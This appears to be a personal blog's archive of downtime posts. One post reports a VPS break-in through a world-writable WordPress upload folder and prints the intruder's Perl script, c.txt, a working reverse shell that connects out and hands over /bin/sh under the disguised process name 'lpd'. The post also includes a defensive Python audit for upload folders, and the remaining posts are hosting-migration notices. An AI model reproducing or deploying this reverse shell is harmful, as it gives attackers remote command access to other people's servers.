h4x3d.com

Archive
Tag "downtime"

exploit, random image however

Last time this sort of odd situation occurred was way back in 2003 when I had my h4x3d.com website(s) hosted in Germany. People were clueless, but level3 administrators figured it out. WordPress requires some folders to be CHMODDED to 777, read, write, execute all access basically. One of those folders is the wp-content/upload folder. Different programmes, because not only WordPress is to “blame”, such as Coppermine require similar settings for full functionality.

Anyway – someone from Switzerland (bless the logs) had uploaded a Perl script to one of the domains and was running excessive SSH scans. This was also why the VPS slowed down and became unresponsive. Since I was not able to restart it manually, I got in contact with my new VPS support at SolarVPS – they identified the scans and with my CHMOD 777 clue dropped in, some rootkit scans and other audits they were able to chuck out those unwanted visitors and files within an hour.

This is frankly speaking a support everyone is looking for. At zone.net one had varying support quality due to apparent offshoring of support to people that had no clue and merely redirected requests to the level3 techs. It seems like level3 techs reside at SolarVPS, else I wonder how they were able to almost instantaneously sort out my problems. I will have to find a solution to the upload folder problem, eventually move it outside the httpdocs? Any advice or comments?

Below you find one of the scripts that was used to call home and cause havoc, I believe this is only the “gateway” and “door opener” for more destructive commands to be executed:

c.txt
#!/usr/bin/perl
use Socket;
$cmd="lpd";
$system='/bin/sh -i';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
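
An audit for the upload-folder problem described in this post, as an added example that is not code from the original page: it walks an upload tree and reports world-writable directories, files with an execute bit, and files whose content is a script regardless of extension (the dropped file here was named c.txt). The marker list, function names and sample tree are assumptions constructed for the illustration.

```python
import os
import stat
import tempfile

# Byte markers of script content (constructed, non-exhaustive list).
SCRIPT_MARKERS = (b"<?php", b"use Socket")


def audit_upload_tree(root):
    """Return sorted (relative_path, finding) pairs for entries below root."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            rel = os.path.relpath(path, root)
            if stat.S_ISDIR(st.st_mode):
                if st.st_mode & stat.S_IWOTH:
                    findings.append((rel, "world-writable directory"))
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
                findings.append((rel, "executable bit set"))
            with open(path, "rb") as fh:
                head = fh.read(4096)
            # The extension is ignored on purpose: the dropped script was c.txt.
            if head.startswith(b"#!") or any(m in head for m in SCRIPT_MARKERS):
                findings.append((rel, "script content"))
    return sorted(findings)


def build_sample_tree(root):
    """Create a constructed sample: one image and one script named like text."""
    uploads = os.path.join(root, "2008")
    os.mkdir(uploads)
    os.chmod(uploads, 0o777)  # the permissive mode the post describes
    with open(os.path.join(uploads, "photo.png"), "wb") as fh:
        fh.write(b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)
    with open(os.path.join(uploads, "c.txt"), "wb") as fh:
        fh.write(b"#!/usr/bin/perl\nuse Socket;\n")
    return uploads


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for rel, finding in audit_upload_tree(tmp):
            print(f"{finding}: {rel}")
```

Run against a real upload directory, any "script content" hit deserves a manual look, since an upload folder for images should hold no interpreter scripts at all.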

Just wanted everyone to know that this (and other sites) are going to be transferred to a new VPS internally at zone.net.
More news to come soon. Please be aware that comments might get lost due to unsynchronized databases.
Sorry for any inconvenience!

zone.net

Just wanted everyone to know that this (and other sites) are going to be put in maintenance mode for two hours (2).
After that everything should be back up and working just fine. Europe: 01.00 to 03.00 (add one hour for UK), USA: (West Coast) 16.00 to 18.00, (East Coast) 19.00 to 21.00.

Sorry for any inconvenience!

Dear Visitors to h4x3d.com,
sorry for the downtime over the past 24 hours. My websites got moved over to a new server and somehow some screws got loose. You may find some links/images/files not yet working, but I am sure the guys over at dreamhost are doing their best to sort this mess out.

We are now on nehi server and no longer on the laggy clamato. Thanks to the great time-off my advertisement earnings have been massive: 0,78 cent in 24 hours. Awesome!

UPDATE

Seems like they (dreamhost.com) found out what was the loose screw:


I apologize for the inconvenience this has caused you. It appears there
was an issue with DNS, and our servers were still pointing to the old
webserver, instead of the new one you were moved to.

I have manually pushed the DNS for all your domains, but it will still
take up to 24 hours for your sites to be fully working.  Some of your
sites may have already propagated, but some will still display the
'bad_httpd_conf' error.

If you continue to experience problems after 24 hours, let me know!  You
can email me directly at (name deleted)@dreamhost.com, or simply reply to this
ticket.

Thanks!

(name deleted)